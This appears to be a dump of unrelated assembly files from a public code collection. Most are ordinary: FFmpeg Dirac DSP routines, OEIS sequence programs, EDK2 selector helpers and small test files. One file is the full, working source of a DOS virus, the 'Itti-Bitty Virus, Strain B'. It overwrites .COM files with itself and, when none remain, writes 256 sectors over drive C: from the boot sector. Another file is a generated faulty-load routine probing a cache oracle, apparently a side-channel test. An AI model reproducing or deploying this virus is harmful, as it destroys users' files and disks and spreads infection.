.global s_prepare_buffers s_prepare_buffers: ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r15 push %r9 push %rax push %rbp push %rbx // Store lea addresses_PSE+0xe9e2, %r12 nop nop nop nop sub %rax, %rax mov $0x5152535455565758, %r9 movq %r9, (%r12) nop nop nop nop nop inc %r10 // Store lea addresses_normal+0x1a0f6, %rbp nop nop nop nop cmp $79, %r10 movl $0x51525354, (%rbp) sub %rbp, %rbp // Store lea addresses_RW+0x15ce2, %rbp nop nop nop cmp $29614, %r9 movb $0x51, (%rbp) nop add %rbx, %rbx // Load mov $0x3e2, %r12 nop nop nop nop nop xor %r15, %r15 mov (%r12), %ax nop nop nop add %r15, %r15 // Load lea addresses_WT+0x75c2, %r9 nop nop nop nop nop and %rax, %rax mov (%r9), %bx nop nop sub %r9, %r9 // Faulty Load lea addresses_WT+0x157e2, %rax nop nop nop add %r15, %r15 mov (%rax), %r10w lea oracles, %rbx and $0xff, %r10 shlq $12, %r10 mov (%rbx,%r10,1), %r10 pop %rbx pop %rbp pop %rax pop %r9 pop %r15 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'NT': True, 'same': False, 'congruent': 0, 'type': 'addresses_WT', 'AVXalign': True, 'size': 16}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 7, 'type': 'addresses_PSE', 'AVXalign': False, 'size': 8}} {'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 2, 'type': 'addresses_normal', 'AVXalign': False, 'size': 4}} {'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_RW', 'AVXalign': False, 'size': 1}} {'src': {'NT': False, 'same': False, 'congruent': 10, 'type': 'addresses_P', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'} {'src': {'NT': False, 'same': False, 'congruent': 4, 'type': 'addresses_WT', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'} [Faulty Load] {'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_WT', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'} <gen_prepare_buffer> {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */

43.451327

2,999

0.652953

c4e95e6fb9e74dc444f8d647abf6fb02213b0d34

154

asm

Assembly

libsrc/_DEVELOPMENT/threads/context/__thread_critical_section_end.asm

teknoplop/z88dk

bb03fbfd6b2ab0f397a1358559089f9cd3706485

[ "ClArtistic" ]

null

libsrc/_DEVELOPMENT/threads/context/__thread_critical_section_end.asm

teknoplop/z88dk

bb03fbfd6b2ab0f397a1358559089f9cd3706485

[ "ClArtistic" ]

null

libsrc/_DEVELOPMENT/threads/context/__thread_critical_section_end.asm

teknoplop/z88dk

bb03fbfd6b2ab0f397a1358559089f9cd3706485

[ "ClArtistic" ]

1

2019-12-03T23:57:48.000Z

SECTION code_clib SECTION code_threads PUBLIC __thread_critical_section_end EXTERN asm_z80_pop_ei defc __thread_critical_section_end = asm_z80_pop_ei

15.4

51

0.88961

597e079721039da3782c48482e532890749c830a

146

asm

Assembly

verify/output/int_real_symbol.alfy.asm

alexandruradovici/alf-alfy-asm-public

43a73cc13c38f39125620fb9bd566c261cff1c73

[ "BSD-2-Clause" ]

null

verify/output/int_real_symbol.alfy.asm

alexandruradovici/alf-alfy-asm-public

43a73cc13c38f39125620fb9bd566c261cff1c73

[ "BSD-2-Clause" ]

2

2017-05-18T20:29:57.000Z

2017-05-19T19:03:07.000Z

verify/output/int_real_symbol.alfy.asm

alexandruradovici/alf-alfy-asm-language-public

43a73cc13c38f39125620fb9bd566c261cff1c73

[ "BSD-2-Clause" ]

null

start: set r2 2 set r3 3500 set r4 1000 mul r2 r2 r4 add r4 r2 r3 set r2 'e' set r3 1000 mul r2 r2 r3 add r5 r4 r2 writenumber r5 stop

11.230769

15

0.664384

28472482b507ac6c6ccc41b0008fb01649a3a048

422

asm

Assembly

programs/oeis/183/A183063.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/183/A183063.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/183/A183063.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A183063: Number of even divisors of n. ; 0,1,0,2,0,2,0,3,0,2,0,4,0,2,0,4,0,3,0,4,0,2,0,6,0,2,0,4,0,4,0,5,0,2,0,6,0,2,0,6,0,4,0,4,0,2,0,8,0,3,0,4,0,4,0,6,0,2,0,8,0,2,0,6,0,4,0,4,0,4,0,9,0,2,0,4,0,4,0,8,0,2,0,8,0,2,0,6,0,6,0,4,0,2,0,10,0,3,0,6 mov $2,$0 div $0,2 seq $0,5 ; d(n) (also called tau(n) or sigma_0(n)), the number of divisors of n. mod $2,2 mov $1,$2 mul $1,$0 pow $2,$2 mul $2,2 add $1,$2 sub $1,2 mov $0,$1

28.133333

202

0.554502

e486defe3e0c5ae747f51270ac3ea40dd0adcd05

6,951

asm

Assembly

hmi_sdk/hmi_sdk/Tools/ffmpeg-2.6.2/libavcodec/x86/diracdsp_yasm.asm

APCVSRepo/android_packet

5d4237234656b777cd9b0cae4731afea51986582

[ "BSD-3-Clause" ]

4

2016-09-21T12:36:24.000Z

2020-10-29T01:45:03.000Z

hmi_sdk/hmi_sdk/Tools/ffmpeg-2.6.2/libavcodec/x86/diracdsp_yasm.asm

APCVSRepo/android_packet

5d4237234656b777cd9b0cae4731afea51986582

[ "BSD-3-Clause" ]

7

2016-06-01T01:21:44.000Z

2017-11-03T08:18:23.000Z

hmi_sdk/hmi_sdk/Tools/ffmpeg-2.6.2/libavcodec/x86/diracdsp_yasm.asm

APCVSRepo/android_packet

5d4237234656b777cd9b0cae4731afea51986582

[ "BSD-3-Clause" ]

8

2017-08-29T10:51:50.000Z

2021-03-24T10:19:11.000Z

;****************************************************************************** ;* Copyright (c) 2010 David Conrad ;* ;* This file is part of FFmpeg. ;* ;* FFmpeg is free software; you can redistribute it and/or ;* modify it under the terms of the GNU Lesser General Public ;* License as published by the Free Software Foundation; either ;* version 2.1 of the License, or (at your option) any later version. ;* ;* FFmpeg is distributed in the hope that it will be useful, ;* but WITHOUT ANY WARRANTY; without even the implied warranty of ;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ;* Lesser General Public License for more details. ;* ;* You should have received a copy of the GNU Lesser General Public ;* License along with FFmpeg; if not, write to the Free Software ;* 51, Inc., Foundation Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA ;****************************************************************************** %include "libavutil/x86/x86util.asm" SECTION_RODATA pw_7: times 8 dw 7 cextern pw_3 cextern pw_16 cextern pw_32 cextern pb_80 section .text %macro UNPACK_ADD 6 mov%5 %1, %3 mov%6 m5, %4 mova m4, %1 mova %2, m5 punpcklbw %1, m7 punpcklbw m5, m7 punpckhbw m4, m7 punpckhbw %2, m7 paddw %1, m5 paddw %2, m4 %endmacro %macro HPEL_FILTER 1 ; dirac_hpel_filter_v_sse2(uint8_t *dst, uint8_t *src, int stride, int width); cglobal dirac_hpel_filter_v_%1, 4,6,8, dst, src, stride, width, src0, stridex3 mov src0q, srcq lea stridex3q, [3*strideq] sub src0q, stridex3q pxor m7, m7 .loop: ; 7*(src[0] + src[1]) UNPACK_ADD m0, m1, [srcq], [srcq + strideq], a,a pmullw m0, [pw_7] pmullw m1, [pw_7] ; 3*( ... + src[-2] + src[3]) UNPACK_ADD m2, m3, [src0q + strideq], [srcq + stridex3q], a,a paddw m0, m2 paddw m1, m3 pmullw m0, [pw_3] pmullw m1, [pw_3] ; ... - 7*(src[-1] + src[2]) UNPACK_ADD m2, m3, [src0q + strideq*2], [srcq + strideq*2], a,a pmullw m2, [pw_7] pmullw m3, [pw_7] psubw m0, m2 psubw m1, m3 ; ... - (src[-3] + src[4]) UNPACK_ADD m2, m3, [src0q], [srcq + strideq*4], a,a psubw m0, m2 psubw m1, m3 paddw m0, [pw_16] paddw m1, [pw_16] psraw m0, 5 psraw m1, 5 packuswb m0, m1 mova [dstq], m0 add dstq, mmsize add srcq, mmsize add src0q, mmsize sub widthd, mmsize jg .loop RET ; dirac_hpel_filter_h_sse2(uint8_t *dst, uint8_t *src, int width); cglobal dirac_hpel_filter_h_%1, 3,3,8, dst, src, width dec widthd pxor m7, m7 and widthd, ~(mmsize-1) .loop: ; 7*(src[0] + src[1]) UNPACK_ADD m0, m1, [srcq + widthq], [srcq + widthq + 1], u,u pmullw m0, [pw_7] pmullw m1, [pw_7] ; 3*( ... + src[-2] + src[3]) UNPACK_ADD m2, m3, [srcq + widthq - 2], [srcq + widthq + 3], u,u paddw m0, m2 paddw m1, m3 pmullw m0, [pw_3] pmullw m1, [pw_3] ; ... - 7*(src[-1] + src[2]) UNPACK_ADD m2, m3, [srcq + widthq - 1], [srcq + widthq + 2], u,u pmullw m2, [pw_7] pmullw m3, [pw_7] psubw m0, m2 psubw m1, m3 ; ... - (src[-3] + src[4]) UNPACK_ADD m2, m3, [srcq + widthq - 3], [srcq + widthq + 4], u,u psubw m0, m2 psubw m1, m3 paddw m0, [pw_16] paddw m1, [pw_16] psraw m0, 5 psraw m1, 5 packuswb m0, m1 mova [dstq + widthq], m0 sub widthd, mmsize jge .loop RET %endmacro %macro PUT_RECT 1 ; void put_rect_clamped(uint8_t *dst, int dst_stride, int16_t *src, int src_stride, int width, int height) cglobal put_signed_rect_clamped_%1, 5,9,3, dst, dst_stride, src, src_stride, w, dst2, src2 mova m0, [pb_80] add wd, (mmsize-1) and wd, ~(mmsize-1) %if ARCH_X86_64 movsxd dst_strideq, dst_strided movsxd src_strideq, src_strided mov r7d, r5m mov r8d, wd %define wspill r8d %define hd r7d %else mov r4m, wd %define wspill r4m %define hd r5mp %endif .loopy lea src2q, [srcq+src_strideq*2] lea dst2q, [dstq+dst_strideq] .loopx: sub wd, mmsize mova m1, [srcq +2*wq] mova m2, [src2q+2*wq] packsswb m1, [srcq +2*wq+mmsize] packsswb m2, [src2q+2*wq+mmsize] paddb m1, m0 paddb m2, m0 mova [dstq +wq], m1 mova [dst2q+wq], m2 jg .loopx lea srcq, [srcq+src_strideq*4] lea dstq, [dstq+dst_strideq*2] sub hd, 2 mov wd, wspill jg .loopy RET %endm %macro ADD_RECT 1 ; void add_rect_clamped(uint8_t *dst, uint16_t *src, int stride, int16_t *idwt, int idwt_stride, int width, int height) cglobal add_rect_clamped_%1, 7,9,3, dst, src, stride, idwt, idwt_stride, w, h mova m0, [pw_32] add wd, (mmsize-1) and wd, ~(mmsize-1) %if ARCH_X86_64 movsxd strideq, strided movsxd idwt_strideq, idwt_strided mov r8d, wd %define wspill r8d %else mov r5m, wd %define wspill r5m %endif .loop: sub wd, mmsize movu m1, [srcq +2*wq] ; FIXME: ensure alignment paddw m1, m0 psraw m1, 6 movu m2, [srcq +2*wq+mmsize] ; FIXME: ensure alignment paddw m2, m0 psraw m2, 6 paddw m1, [idwtq+2*wq] paddw m2, [idwtq+2*wq+mmsize] packuswb m1, m2 mova [dstq +wq], m1 jg .loop lea srcq, [srcq + 2*strideq] add dstq, strideq lea idwtq, [idwtq+ 2*idwt_strideq] sub hd, 1 mov wd, wspill jg .loop RET %endm %macro ADD_OBMC 2 ; void add_obmc(uint16_t *dst, uint8_t *src, int stride, uint8_t *obmc_weight, int yblen) cglobal add_dirac_obmc%1_%2, 6,6,5, dst, src, stride, obmc, yblen pxor m4, m4 .loop: %assign i 0 %rep %1 / mmsize mova m0, [srcq+i] mova m1, m0 punpcklbw m0, m4 punpckhbw m1, m4 mova m2, [obmcq+i] mova m3, m2 punpcklbw m2, m4 punpckhbw m3, m4 pmullw m0, m2 pmullw m1, m3 movu m2, [dstq+2*i] movu m3, [dstq+2*i+mmsize] paddw m0, m2 paddw m1, m3 movu [dstq+2*i], m0 movu [dstq+2*i+mmsize], m1 %assign i i+mmsize %endrep lea srcq, [srcq+strideq] lea dstq, [dstq+2*strideq] add obmcq, 32 sub yblend, 1 jg .loop RET %endm INIT_MMX %if ARCH_X86_64 == 0 PUT_RECT mmx ADD_RECT mmx HPEL_FILTER mmx ADD_OBMC 32, mmx ADD_OBMC 16, mmx %endif ADD_OBMC 8, mmx INIT_XMM PUT_RECT sse2 ADD_RECT sse2 HPEL_FILTER sse2 ADD_OBMC 32, sse2 ADD_OBMC 16, sse2

26.131579

120

0.551719

ecf813732c0d0b0fbf9b8767d58b4e97cd192c7a

3,286

asm

Assembly

programs/oeis/050/A050484.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/050/A050484.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/050/A050484.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A050484: Partial sums of A051946. ; 1,12,68,264,810,2112,4884,10296,20163,37180,65208,109616,177684,279072,426360,635664,927333,1326732,1865116,2580600,3519230,4736160,6296940,8278920,10772775,13884156,17735472,22467808,28242984,35245760,43686192,53802144,65861961,80167308,97056180,116906088,140137426,167217024,198661892,235043160,276990219,325195068,380416872,443486736,515312700,596884960,689281320,793672880,911329965,1043628300,1192055436,1358217432,1543845798,1750804704,1981098460,2236879272,2520455279,2834298876,3181055328,3563551680,3984805968,4448036736,4956672864,5514363712,6124989585,6792672524,7521787428,8316973512,9183146106,10125508800,11149565940,12261135480,13466362195,14771731260,16184082200,17710623216,19358945892,21137040288,23053310424,25116590160,27336159477,29721761164,32283617916,35032449848,37979492430,41136514848,44515838796,48130357704,51993556407,56119531260,60523010704,65219376288,70224684152,75555686976,81229856400,87265405920,93681314265,100497349260,107734092180,115412962600,123556243746,132187108352,141329645028,151008885144,161250830235,172082479932,183531860424,195628053456,208401225868,221882659680,236104782728,251101199856,266906724669,283557411852,301090590060,319544895384,338960305398,359378173792,380841265596,403393793000,427081451775,451951458300,478052587200,505435209600,534151332000,564254635776,595800517312,628846128768,663450419489,699674178060,737580075012,777232706184,818698636746,862046445888,907346772180,954672359608,1004098104291,1055701101884,1109560695672,1165758525360,1224378576564,1285507231008,1349233317432,1415648163216,1484845646725,1556922250380,1631977114460,1710112091640,1791431802270,1876043690400,1964058080556,2055588235272,2150750413383,2249663929084,2352451211760,2459237866592,2570152735944,2685327961536,2804899047408,2929004923680,3057788011113,3191394286476,3329973348724,3473678485992,3622666743410,3777098991744,3937139996868,4102958490072,4274727239211,4452623120700,4636827192360,4827524767120,5024905487580,5229163401440,5440497037800,5659109484336,5885208465357,6119006420748,6360720585804,6610573071960,6868790948422,7135606324704,7411256434076,7695983717928,7990035911055,8293666127868,8607132949536,8930700512064,9264638595312,9609222712960,9964734203424,10331460321728,10709694332337,11099735602956,11501889699300,11916468480840,12343790197530,12784179587520,13237967975860,13705493374200,14187100581491,14683141285692,15193974166488,15719964999024,16261486758660,16818919726752,17392651597464,17983077585616,18590600535573,19215631031180,19858587506748,20519896359096,21199992060654,21899317273632,22618322965260,23357468524104,24117221877463,24898059609852,25700467082576,26524938554400,27371977303320,28242095749440,29135815578960,30053667869280,30996193215225,31963941856396,32957473805652,33977358978728,35024177324994,36098518959360,37200984295332,38332184179224,39492740025531,40683283953468,41904458924680,43156918882128,44441328890156,45758365275744,47108715770952,48493079656560,49912167906909,51366703335948,52857420744492,54385067068696,55950401529750,57554195784800,59197234079100,60880313399400,62604243628575,64369847701500 lpb $0,1 mov $2,$0 cal $2,51946 ; Expansion of g.f.: (1+4*x)/(1-x)^7. sub $0,1 mul $2,2 add $3,$2 mov $1,$3 lpe div $1,2 add $1,1

234.714286

3,106

0.898661

d71f1beecc501ddf418fd0e8733d122141c828a2

2,722

asm

Assembly

MSDOS/Virus.MSDOS.Unknown.itti-b.asm

fengjixuchui/Family

2abe167082817d70ff2fd6567104ce4bcf0fe304

[ "MIT" ]

3

2021-05-15T15:57:13.000Z

2022-03-16T09:11:05.000Z

MSDOS/Virus.MSDOS.Unknown.itti-b.asm

fengjixuchui/Family

2abe167082817d70ff2fd6567104ce4bcf0fe304

[ "MIT" ]

null

MSDOS/Virus.MSDOS.Unknown.itti-b.asm

fengjixuchui/Family

2abe167082817d70ff2fd6567104ce4bcf0fe304

[ "MIT" ]

3

2021-05-15T15:57:15.000Z

2022-01-08T20:51:04.000Z

; The Itti-Bitty Virus, Strain B ; The smallest virus ever written (only 99 bytes) ; ; (C) 1991 Nowhere Man and [NuKE] WaErZ ; Written by Nowhere Man ; ; title "The Itti-Bitty Virus, Strain B: Even smaller" code segment 'CODE' assume cs:code,ds:code,es:code,ss:code org 0100h code_length equ finish - start start label near id_bytes proc near mov si,si ; Serves no purpose: our ID id_bytes endp main proc near mov ah,04Eh ; DOS find first file function mov cx,00100111b ; CX holds attribute mask mov dx,offset com_spec ; DX points to "*.COM" file_loop: int 021h jc go_off ; If there are no files, go off call infect_file ; Try to infect found file jne exit_virus ; Exit if successful mov ah,04Fh ; DOS find next file function jmp short file_loop ; Repeat until out of files exit_virus: mov ax,04C01h ; DOS terminate function, code 1 int 021h main endp go_off proc near cli ; Prevent all interrupts mov ah,2 ; AH holds drive number (C:) cwd ; Start with sector 0 (boot sector) mov cx,0100h ; Write 256 sectors (fucks disk) int 026h ; DOS absolute write interrupt jmp $ ; Infinite loop; lock up computer go_off endp infect_file proc near mov ax,03D02h ; DOS open file function, read-write mov dx,09Eh ; DX points to the victim int 021h xchg bx,ax ; BX holds file handle mov ah,03Fh ; DOS read from file function mov cx,2 ; CX holds byte to read (2) mov dx,offset buffer ; DX points to buffer int 021h cmp word ptr [buffer],0F68Bh ; Are the two bytes "MOV SI,SI" pushf ; Save flags je close_it_up ; If not, then file is OK cwd ; Zero CX \_ Zero bytes from start mov cx,dx ; Zero DX / mov ax,04200h ; DOS file seek function, start int 021h mov ah,040h ; DOS write to file function mov cx,code_length ; CX holds virus length mov dx,offset start ; DX points to start of virus int 021h close_it_up: mov ah,03Eh ; DOS close file function int 021h popf ; Restore flags ret ; Return to caller buffer dw ? ; Buffer to hold test data infect_file endp ; Initialized data goes here com_spec db "*.COM",0 ; What to infect: all COM files finish label near code ends end id_bytes

28.354167

70

0.570904

19d6789295bab8bad141539538e02e218ec14f10

1,594

nasm

Assembly

UefiCpuPkg/CpuDxe/X64/CpuAsm.nasm

James992927108/uEFI_Edk2_Practice

2cac7618dfee10bfa5104a2e167c85425fde0100

[ "BSD-2-Clause" ]

1

2020-05-10T09:43:50.000Z

UefiCpuPkg/CpuDxe/X64/CpuAsm.nasm

James992927108/uEFI_Edk2_Practice

2cac7618dfee10bfa5104a2e167c85425fde0100

[ "BSD-2-Clause" ]

null

UefiCpuPkg/CpuDxe/X64/CpuAsm.nasm

James992927108/uEFI_Edk2_Practice

2cac7618dfee10bfa5104a2e167c85425fde0100

[ "BSD-2-Clause" ]

null

;------------------------------------------------------------------------------ ;* ;* Copyright (c) 2016, Intel Corporation. All rights reserved.<BR> ;* This program and the accompanying materials ;* are licensed and made available under the terms and conditions of the BSD License ;* which accompanies this distribution. The full text of the license may be found at ;* http://opensource.org/licenses/bsd-license.php ;* ;* THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, ;* WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. ;* ;* CpuAsm.nasm ;* ;* Abstract: ;* ;------------------------------------------------------------------------------ DEFAULT REL SECTION .text ;------------------------------------------------------------------------------ ; VOID ; SetCodeSelector ( ; UINT16 Selector ; ); ;------------------------------------------------------------------------------ global ASM_PFX(SetCodeSelector) ASM_PFX(SetCodeSelector): sub rsp, 0x10 lea rax, [setCodeSelectorLongJump] mov [rsp], rax mov [rsp+4], cx jmp dword far [rsp] setCodeSelectorLongJump: add rsp, 0x10 ret ;------------------------------------------------------------------------------ ; VOID ; SetDataSelectors ( ; UINT16 Selector ; ); ;------------------------------------------------------------------------------ global ASM_PFX(SetDataSelectors) ASM_PFX(SetDataSelectors): o16 mov ss, cx o16 mov ds, cx o16 mov es, cx o16 mov fs, cx o16 mov gs, cx ret

30.075472

87

0.468632

6a0dd70d94f01aadca443407321ab214f5f3ed35

749

asm

Assembly

programs/oeis/007/A007528.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/007/A007528.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/007/A007528.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A007528: Primes of the form 6k-1. ; 5,11,17,23,29,41,47,53,59,71,83,89,101,107,113,131,137,149,167,173,179,191,197,227,233,239,251,257,263,269,281,293,311,317,347,353,359,383,389,401,419,431,443,449,461,467,479,491,503,509,521,557,563,569,587,593,599,617,641,647,653,659,677,683,701,719,743,761,773,797,809,821,827,839,857,863,881,887,911,929,941,947,953,971,977,983,1013,1019,1031,1049,1061,1091,1097,1103,1109,1151,1163,1181,1187,1193 mov $2,261241 mov $6,4 lpb $2 sub $2,1 mov $3,$6 seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0. sub $0,$3 mov $4,$0 max $4,0 cmp $4,$0 mov $5,11 lpb $5 add $1,5 mul $2,$4 trn $5,6 add $6,3 lpe lpe sub $1,10 div $1,10 mul $1,6 add $1,5 mov $0,$1

27.740741

402

0.658211

035eefb47cb18e12d1157469bbb5fdef3e913c41

217

asm

Assembly

tests/Zenos.Tests/resources/Assembler/variables.asm

zenos-os/zenos-assembler

8d1cd0058c7bd94e58b50f9eac09540caab20a40

[ "MIT" ]

1

2019-04-26T17:11:51.000Z

tests/Zenos.Tests/resources/Assembler/variables.asm

zenos-os/zenos-assembler

8d1cd0058c7bd94e58b50f9eac09540caab20a40

[ "MIT" ]

null

tests/Zenos.Tests/resources/Assembler/variables.asm

zenos-os/zenos-assembler

8d1cd0058c7bd94e58b50f9eac09540caab20a40

[ "MIT" ]

null

bits 64 section .data HSP: dq 256 LCL: dq 1024 ARG: dq 2048 THIS: dq 4096 THAT: dq 0 section .text ; D=17 mov rdx, 17 ; *SP=D mov rax, [HSP] mov [rax], rdx ; SP++ mov rax, [HSP] add rax, 1 mov [HSP], rax

9.863636

15

0.599078

0cefd548dc035500ee6b3b8c07e4a0b0d49c9150

222

asm

Assembly

wof/lcs/base/1BE.asm

zengfr/arcade_game_romhacking_sourcecode_top_secret_data

a4a0c86c200241494b3f1834cd0aef8dc02f7683

[ "Apache-2.0" ]

6

2020-10-14T15:29:10.000Z

2022-02-12T18:58:54.000Z

wof/lcs/base/1BE.asm

zengfr/arcade_game_romhacking_sourcecode_top_secret_data

a4a0c86c200241494b3f1834cd0aef8dc02f7683

[ "Apache-2.0" ]

null

wof/lcs/base/1BE.asm

zengfr/arcade_game_romhacking_sourcecode_top_secret_data

a4a0c86c200241494b3f1834cd0aef8dc02f7683

[ "Apache-2.0" ]

1

2020-12-17T08:59:10.000Z

copyright zengfr site:http://github.com/zengfr/romhack 012C68 st ($1c3,A5) [base+1BE] 012CD6 lea ($5e,PC,D1.w), A1 [base+1BE] 01A610 dbra D1, $1a60e copyright zengfr site:http://github.com/zengfr/romhack

27.75

54

0.684685

20e2a3c2ccb3cc55b782ada34a908778f6ec0db6

1,479

asm

Assembly

programs/oeis/273/A273849.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/273/A273849.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/273/A273849.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A273849: Partial sums of the number of active (ON,black) cells in n-th stage of growth of two-dimensional cellular automaton defined by "Rule 969", based on the 5-celled von Neumann neighborhood. ; 1,5,26,71,147,268,437,662,951,1312,1753,2282,2907,3636,4477,5438,6527,7752,9121,10642,12323,14172,16197,18406,20807,23408,26217,29242,32491,35972,39693,43662,47887,52376,57137,62178,67507,73132,79061,85302,91863,98752,105977,113546,121467,129748,138397,147422,156831,166632,176833,187442,198467,209916,221797,234118,246887,260112,273801,287962,302603,317732,333357,349486,366127,383288,400977,419202,437971,457292,477173,497622,518647,540256,562457,585258,608667,632692,657341,682622,708543,735112,762337,790226,818787,848028,877957,908582,939911,971952,1004713,1038202,1072427,1107396,1143117,1179598,1216847,1254872,1293681,1333282,1373683,1414892,1456917,1499766,1543447,1587968,1633337,1679562,1726651,1774612,1823453,1873182,1923807,1975336,2027777,2081138,2135427,2190652,2246821,2303942,2362023,2421072,2481097,2542106,2604107,2667108,2731117,2796142,2862191 mov $5,$0 mov $7,$0 add $7,1 lpb $7,1 clr $0,5 mov $0,$5 sub $7,1 sub $0,$7 lpb $0,1 mov $1,$0 sub $1,1 cal $1,273850 ; First differences of number of active (ON,black) cells in n-th stage of growth of two-dimensional cellular automaton defined by "Rule 969", based on the 5-celled von Neumann neighborhood. sub $0,1 add $2,$1 lpe mov $1,$2 add $1,1 add $6,$1 lpe mov $1,$6

61.625

867

0.772819

71c746d6eae49bbc7ee11e7d599e7a6b781e5c1b

6,053

asm

Assembly

